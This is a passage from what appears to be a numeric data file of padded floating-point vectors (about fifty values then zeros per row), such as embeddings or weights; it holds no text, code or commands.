0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.632305, 0.0412482, -0.540681, -0.165997, 0.220873, -0.129048, 0.168887, -0.994412, 0.141814, -0.219544, -0.0124984, 0.138516, 0.162982, 0.268959, -0.557615, 0.274573, -0.993238, -0.0918738, 0.615859, -0.179101, 0.0966425, 0.219819, -0.145608, -0.544013, -0.0290327, -0.0114326, -0.213131, 0.166701, 0.0333745, 0.17205, -2.8335, 0.310848, 0.00191265, -0.448736, -0.429262, 0.0119225, 0.222933, 0.0202681, 0.176466, 0.227715, 0.40528, 0.0194034, 0.370197, -0.0536075, -0.0216867, -0.60503, -0.181651, 0.162705, -0.195963, -0.00411197, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.29554, 0.0134774, -0.0766397, 1.55444, -0.00156924, -0.690961, 0.343543, 0.783698, 0.150708, -0.265535, 0.0480418, 0.446613, -0.623718, -0.968348, -0.391631, -0.177534, 1.59797, -0.745347, 1.02228, -0.131052, 0.484417, -0.502683, -0.493821, 0.705358, -0.00197819, -0.0333751, 1.20488, -0.788768, 1.45751, -0.215878, 0.263781, -0.479928, -0.343349, -0.973586, 0.726654, 0.719119, 0.450342, 0.0380341, -0.412317, -0.71363, 0.350072, -0.676184, 0.705949, -0.00288373, 0.238811, -0.0433828, 0.875698, 0.35563, -0.646988, -0.269284, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.925119, 0.0347794, 0.583957, 2.62754, 1.2478, -0.235001, 0.316653, 0.72752, 0.199335, -0.216497, 0.0101935, 0.14869, -0.110396, -0.024033, 0.456126, -0.490487, 0.196107, 0.546506, -0.352632, 0.0783501, 0.672063, 0.693502, -0.00819177, 0.15191, -0.0157389, -0.0373847, -1.63118, 0.417357, 0.715541, -0.0381919, 0.554091, -1.79529, -0.107839, -0.268705, -0.0496835, 0.146279, -0.136102, 0.00729548, 1.30949, -0.874077, 0.0343603, 0.133566, -0.355562, 0.0273204, -0.00838481, -0.604518, -1.02755, 0.0375703, -0.0240937, -0.222968, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.527795, 0.0383142, -0.0262704, -0.0558835, 1.03953, -0.045299, 0.619427, 0.388013, 0.196309, 0.0995666, 0.0250881, -0.475638, 0.494389, 0.366606, -0.0601781, -0.326281, 0.320777, -0.914559, -0.237588, -0.0936699, -0.211966, -0.0690574, -0.271039, -0.210916, 0.0038806, 0.0158154, -0.372675, -0.570993, -0.304966, 0.44216, -0.0889994, 0.424015, 0.149365, -0.130786, 0.693733, 0.218213, -0.280842, 0.0195526, -3.5402, -1.05933, 0.303139, 0.203008, -0.789994, -0.0378943, 0.388755, 0.333951, -0.558641, 0.923171, 0.00373548, -0.0270135, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.609429, -0.0267744, -0.580239, 0.709073, 1.54059, 1.27831, 1.19364, -0.085278, -0.214036, 0.135961, 0.018017, -0.929485, 0.245321, 0.350963, -0.52767, 0.312389, -0.69484, -0.888829, 0.989515, 0.0686288, 0.511784, 0.777572, 0.483711, 0.593932, -0.0176397, -0.00807724, 0.478705, -0.272688, 0.931793, -1.08836, -0.228822, 0.179002, -0.208995, -0.0970445, -0.22213, -0.350161, 0.335524, -0.0359516, -1.12456, 0.034913, -0.0466457, 0.510957, 0.0574043, -0.0493969, 0.462243, -0.568002, 0.145591, -0.448148, -0.390142, -0.43503, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0281987, 0.000566582, -0.03319, 0.0221532, -0.00849354, -0.0180649, -0.0565698, -0.0119536, 0.0327668, 0.0118744, -0.0385735, -0.0314957, -0.0186819, -0.0245256, -0.0309155, -0.0117556, -0.00760115, 0.00568355, -0.0477713, -0.0185308, -0.0168257, -0.0325391, -0.0412281, 0.0357343, 0.00292336, -0.0178145, 0.0438456, 0.0184717, -0.0219421, -0.0254984, -0.0324205, -0.0493456, 0.00990545, -0.0401097, -0.0324605, -0.0212912, -0.0194038, -0.0400194, 0.0053588, -0.0263758, -0.0080125, -0.021069, 0.009917, 0.0446544, 0.0345754, -0.0117978, 0.0309422, -0.0197059, -0.02869, 0.0284456, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.498226, -0.00212754, -0.300608, -1.30814, -1.94194, 0.254332, -0.145014, -0.769556, -0.0293914, 0.205862, -0.0193495, 0.912017, 0.395964, -0.10937, -0.165953, 0.219708, -0.99907, 1.00183, 0.153223, 0.710201, -0.356056, 0.472834, -0.150369, 0.90725, -0.0108754, -0.0156438, -0.644223, 0.0745345, 1.92381, 0.498027, -0.0260848, -0.832925, 0.139549, -0.929577, -0.709852, -0.900559, 0.320868, -0.00162844, -0.109856, 0.465536, -0.423107, 0.531479, 0.383489, 0.0733732, 0.327893, -0.49893, 0.239318, -0.881306, 0.159369, -0.360308, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.265352, -0.0307186, 0.0462529, -0.181781, 0.733043, -0.193816, 0.281904, -0.699689, 0.186055, -0.0936909, 0.0238121, -0.0934531, 0.264831, -0.177657, 0.0420084, 0.374126, -0.172945, 0.0928257, 0.439511, -0.0465424, -0.880043, -0.476758, -0.0776608, 0.166694, -0.0312025, -0.0423739, -0.413975, -0.0678724, 0.130769, -0.748384, 0.287819, -1.11993, 0.331507, -0.269191, -0.00712341, 0.262485, -0.208505, 0.0427367, -0.931398, 0.579382, -0.301603, -0.15717, 0.365364, -0.0236449, 0.133663, 0.401716, -0.075845, -0.0966528, 0.155062, -0.264658, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-2.52108, 0.0290909, -2.017, -3.73543, -4.04761, -0.562509, -0.199905, 1.40298, -0.251244, 0.655591, -0.00431569, -0.704431, 0.846059, -0.793253, 1.19701, -1.70021, 0.626717, -0.717111, 0.141032, 0.558686, 0.298765, -0.790634, -0.592991, -1.09094, 0.0377733, 0.0284864, -0.143141, 0.482417, 0.585517, 1.09315, -0.469709, -5.97111, -0.172166, -0.57761, 0.611873, 1.2243, 0.0391898, -0.0215232, -0.336316, -1.70098, 1.57578, 1.69731, -1.11178, -0.0397061, 0.556967, -0.536328, 0.0221273, 1.6325, -0.656437, 1.03972, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0395581, -0.0326162, -0.00405857, -1.02651, -0.107761, 0.138699, -0.00946598, -2.804, -0.204017, -0.775859, 0.00947907, -0.327877, 0.678573, 0.57637, -0.558828, -0.426074, -1.6205, 0.791128, -0.134279, -0.91614, 0.801432, -0.860391, 0.0842009, -0.324098, 0.034872, -0.00224831, -0.624006, -0.908793, -0.363467, -0.369129, 0.674471, -2.98808, -0.214513, 0.151582, -0.537565, -0.899473, 0.503065, -0.0347963, 0.442589, -1.17465, 1.04381, 0.0212021, 0.774294, 0.0275866, 0.630269, -0.435067, 0.272839, 1.03739, -0.677481, -0.570449, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.750542, -0.0218864, 0.0847197, -0.704043, -0.00485713, 0.305485, -0.0585694, -0.490719, 0.474623, 0.0964657, 0.0115016, 0.24122, -0.382614, 0.22311, -0.231176, 0.68719, 0.329334, -0.0391206, -0.347505, 0.340976, -0.267964, -0.533978, 0.173983, -0.322495, -0.0485967, 0.0271819, -0.511946, -0.152064, 0.0743975, -0.0727767, -0.0481172, -0.970282, 0.0936253, -0.068121, -0.276842, 0.0881781, -0.19079, -0.00594462, 0.678953, 1.27712, -0.206637, 0.241272, -0.0020342, 0.0153705, 0.319087, -0.388181, -0.245889, 0.1568, 0.140698, -0.409218, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.797069, -0.0194802, 0.316095, 0.285329, -0.117365, -0.0632377, -0.232592, -0.475468, -0.170941, -0.310699, -0.0232985, 0.160642, 0.0627335, 0.214435, 0.418008, 0.232314, 0.197494, 0.645641, 0.05465, 0.229725, -0.305095, -0.00450711, 0.0072977, 0.728562, -0.0140871, 0.0311146, -0.521048, 0.378378, 0.369133, 0.0929027, 0.221504, 0.57158, 0.302709, 0.176794, 0.454705, -0.525633, 0.087392, 0.0229355, 1.72701, -0.258743, -0.649615, -0.47496, 0.20695, 0.0477512, 0.370692, 0.0448857, 0.115091, 1.01085, 0.167652, 0.267723, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.75265, -0.0376294, 0.669118, 0.652661, 0.592636, -0.560977, 0.130308, 0.0851664, 0.163121, -0.224185, -0.0182982, 0.131956, 0.281181, 0.15409, 0.660591, 0.646505, 0.421292, -0.28295, -0.124709, 0.191452, -0.643629, -0.741481, -0.114439, 0.125842, 0.0262423, -0.0312195, -0.537618, 0.143949, -0.257022, 0.658437, 0.565879, 0.666786, -0.0388398, 0.161569, -0.451911, -0.0419057, -0.2234, -0.0445499, 0.428439, 0.448001, -0.102652, -1.02271, -0.248774, 0.0379576, 0.24753, -0.0889271, -0.474276, -0.144519, 0.495624, -0.0968043, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0951803, -0.00187257, -0.765131, 0.177984, -0.00284895, -0.258364, 0.420046, 0.530761, -0.29008, -0.30458, -0.0321534, -0.269594, 0.245471, 0.141296, -1.3413, -0.647862, -1.14806, -0.221185, -0.422511, -0.0581615, -0.093452, 0.529483, -0.0785954, 0.367973, -0.0237267, -0.0344987, 0.381297, -0.109712, 0.75184, -1.32968, -0.0576448, -1.10399, 0.129584, 0.0876565, 0.270392, -0.602751, 0.360743, -0.0202855, -0.00157789, -0.77742, -0.107373, 0.375024, -0.669179, -0.0412196, -0.0495119, 0.0244512, 0.172365, 0.785415, -0.141102, -0.35196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.25352, 0.0242106, -0.201039, 0.120524, -0.617982, -0.597499, 0.545033, 0.264499, -0.15841, 0.22035, 0.0107195, -0.874233, -0.123166, -0.88207, 0.178922, -0.280296, -0.286, -0.296518, -1.25048, -0.216888, -0.0809658, -0.345123, 0.0340223, -0.317927, 0.0286623, 0.0476056, -0.251601, 0.381293, -0.317358, 0.226015, -0.137131, 0.0653059, -0.0646779, 0.441959, -0.838587, 0.0562255, 0.352452, -0.00729792, 6.06619, 0.0546006, 0.0240395, -0.175076, -0.552587, -0.0185979, 0.188826, 0.15121, 0.387068, 0.108374, -0.145425, 1.02106, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.46427, -0.0209486, -0.161542, 0.764034, -0.484822, -0.331698, 0.136631, -0.602292, 0.331718, 0.572579, -0.0233067, 0.572474, 0.98787, 1.07068, 0.179763, -0.471947, -0.669245, 0.22663, -0.00502685, -0.405876, 0.776654, 0.376396, 0.343438, 0.208682, 0.0233998, 0.000673103, 0.604754, 0.0778545, -0.284744, 0.282232, -0.324121, 0.306166, -0.319713, -0.354589, -0.905442, 0.145754, 0.328999, 0.0185485, 1.04418, -0.290714, -0.0861877, -0.101418, 0.477102, -0.0292807, -0.319395, 0.537465, -0.0509263, -0.449279, -0.429729, -0.47105, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.107584, -0.014962, -0.0359278, -0.372482, 0.702955, 0.762629, 0.35801, 0.0503258, -0.382309, -0.260286, -0.0263229, 0.281257, 0.12175, 0.0935972, -0.197187, 0.125212, 0.400383, -0.395041, 0.565861, 0.036061, -0.177937, 0.137943, -0.193347, 0.060231, 0.00832568, 0.0319692, -0.0170368, -0.277048, 0.409735, -0.062762, 0.0261019, -0.0868398, -0.104258, 0.113326, 0.118536, -0.415733, -0.128723, -0.00505919, 4.17283, -0.325291, -0.192767, 0.0232578, -0.873312, 0.0125965, 0.202984, 0.0939274, -0.233993, -0.10274, 0.158707, 0.537479, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.779768, 0.00460521, -0.107788, 0.413416, 0.0950057, -0.56679, -0.00879277, -0.0498294, -0.150367, -0.320293, -0.0391555, -0.271165, -0.321204, 0.352898, 0.256446, -0.0161893, -0.361139, 0.337897, -0.26479, -0.299872, -0.0254086, -0.254315, 0.155235, -0.0992112, -0.0136903, -0.000655971, 0.07623, -0.070323, -0.285394, -0.0773502, 0.287147, 0.224083, -0.136703, 0.0887629, -0.475407, -0.398168, 0.108211, -0.00939561, 0.636019, -0.467488, 0.0203305, -0.101326, 0.497173, 0.000305703, 0.253283, 0.352609, 0.1912, -0.0233907, -0.0936437, 0.00376748, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.907045, -0.0200609, -0.0542313, 0.256682, -0.273609, -0.0816323, -0.0819423, -0.66743, 0.0648148, -0.371169, -0.0207716, 0.544816, -0.0402844, 0.0818872, 0.244291, 0.92637, 0.000680757, -0.0576869, 0.0118569, -0.0363323, 0.267232, 0.437904, -0.364664, -0.808204, 0.00593985, -0.0288534, 0.450273, 0.451901, 0.604125, -0.323262, 0.0928226, -0.742443, -0.245976, -0.298309, 0.228993, -0.073449, 0.104942, -0.0241614, 0.778216, 0.568608, 0.0823384, 0.262053, 0.0433182, 0.0543064, 0.0359142, 0.249233, -0.658138, -1.19324, 0.0658258, -0.173405, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0553672, 0.00976905, -0.971502, -0.358402, -1.04272, 0.610096, -0.256809, 0.0651194, -0.662467, -0.146877, 0.0258337, -0.334675, -2.20834, -0.259262, 0.93166, 0.45333, -0.70427, 0.786025, -0.535643, -0.215562, 0.847485, 0.445442, 0.455008, 0.43554, -0.0180971, -0.0226917, -0.441285, 0.209312, -0.183792, -0.332497, 1.4979, -0.423652, -14.697, -0.344224, 0.502204, 1.06786, 1.1077, -0.0281584, 0.192195, 1.00017, -0.255278, 0.759057, 0.922768, -0.0367276, 1.12207, -1.31168, -0.471507, -4.65215, 0.0272306, -0.685682, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.234, 0.0293159, 0.332882, 1.24706, -0.773563, 0.116577, -0.572868, 0.259173, -0.337544, 0.159413, 0.00236097, 0.0541645, -0.939995, 0.0436153, 0.454926, 0.335852, 1.42115, -0.36064, 0.146185, -0.0522267, -0.0931296, 0.594653, 0.274627, 0.0927465, 0.0161132, 0.0332546, -0.402924, 0.0338912, 0.187877, -0.404615, 0.0159843, 0.541749, 0.492309, 0.404674, -0.569183, -0.44226, 0.178113, -0.0111348, -0.223976, -0.108061, 0.367642, -1.31615, 0.406011, 0.0156123, 0.227071, -0.519789, -0.513706, 0.462135, 0.0778425, 0.0773384, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.862983, -0.0467611, 0.20696, 0.434222, 0.576017, 1.14255, 0.0566379, -0.636594, 0.0501918, -0.328482, 0.00689944, -0.340273, 0.206483, -0.112446, 0.431302, -0.0805058, 0.0644224, 0.803858, -0.145712, -0.586431, -0.00612225, 0.876199, 0.355141, -0.0433557, -0.0426076, -0.0298103, 0.804772, -0.429625, 0.144828, -0.550955, -0.246674, -0.344367, 0.0142266, 0.0930318, -0.247999, 0.0288773, 0.705361, -0.00428293, 1.87929, -0.13086, -0.034243, 0.0676066, 0.335097, 0.065325, 0.223728, 0.237086, -0.132441, 0.147274, 0.0666699, -0.0768807, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.136454, -0.0301639, 0.211548, 0.400702, -0.163457, -0.102936, -0.0172071, -0.143847, -0.154709, -0.205657, 0.00562801, -0.110026, -0.670649, -0.270103, 0.220789, 0.0869835, -0.389593, -0.134786, 0.0678404, -0.438653, 0.41681, -0.193901, 0.046517, 0.416242, -0.0324072, 0.0417997, 0.725792, 0.0616304, -0.289006, -0.133309, 0.00232118, 1.00188, -0.174772, 0.333639, -0.61906, -0.256912, 0.178977, -0.00362103, 3.48713, 0.171989, 0.00439339, -0.217781, 0.0994489, 0.0242226, 0.172693, 0.564508, 0.591217, -0.821346, -0.219971, 0.143907, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.367219, -0.0147802, 0.248119, -1.60884, 0.381106, 1.10237, -0.312325, 0.509428, 0.214846, -1.41547, -0.0317061, -1.08086, 0.65774, 0.243525, 0.0280457, 0.0785658, 1.2539, -0.205988, 0.00934208, 0.13474, -0.699491, -0.329449, -0.610931, -0.375192, 0.0242696, 0.0322354, 1.14848, -0.439431, -0.266475, 0.411069, 0.1225, 1.74076, -0.384156, 0.0558477, 0.826983, -0.278778, 0.42681, 0.0166626, 1.57558, 0.438477, -0.0420085, 1.06259, 0.565576, 0.0156828, -0.725162, 0.468068, 0.455621, 0.718144, -0.00530784, -0.0925064, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.257706, -0.0331422, 0.276224, 1.37799, -0.825, -0.598808, 0.668442, -0.20559, 0.0580261, 0.30588, -0.0150193, 0.232805, 0.903098, 0.831136, 1.00353, 0.78575, 0.189079, 0.3155, 1.52567, 0.85269, 0.740944, 1.60904, 0.523976, -0.0523105, 0.00529722, -0.0198361, -0.922446, -0.53231, 0.382764, 0.0887215, 0.328277, 0.925958, 0.345025, -0.0630245, 0.257892, -0.363016, 0.749874, -0.0406652, 0.135525, -0.140709, 0.979396, -0.0623986, 0.0922492, -0.0133643, -0.128191, -0.180386, 0.129015, 2.605, -0.299233, -0.800569, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.577885, 0.0215591, 0.148933, -0.170277, -0.386151, 0.0342367, -0.208452, -1.46794, 0.398508, 0.165686, -0.0308293, 0.184304, 0.0772126, 0.158258, -0.396262, 1.24672, -0.0669484, 0.162623, 0.321119, -0.127742, 0.315959, 0.398816, 0.357758, -0.563836, 0.0403536, 0.0251802, 0.0577722, 0.111992, 0.171346, -0.0805749, 0.262344, -1.81049, -0.111044, -0.341043, -0.479481, 0.121563, 0.0885163, -0.0233549, 0.281266, 1.53269, 0.234276, -0.28006, 0.161315, 0.0354072, 0.573879, -0.42122, -0.325846, 0.25698, -0.0852825, -0.21047, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.352779, 0.0373517, 0.449918, 0.275572, -0.089783, -0.186809, -0.119094, -0.899151, -0.242046, -0.229647, 0.0432978, -0.260913, 0.610268, 1.38198, 0.217736, -0.281995, 0.549524, 0.611103, 0.110584, 0.167533, 1.25721, 0.384696, -0.663257, 0.964344, 0.042178, 0.0371448, -1.08815, -0.435193, 0.96901, -0.152442, -0.344656, 1.06736, 0.422155, 0.620929, -0.307627, 0.781426, -0.510016, 0.0378419, 0.119682, -0.160629, 0.320461, -0.111042, 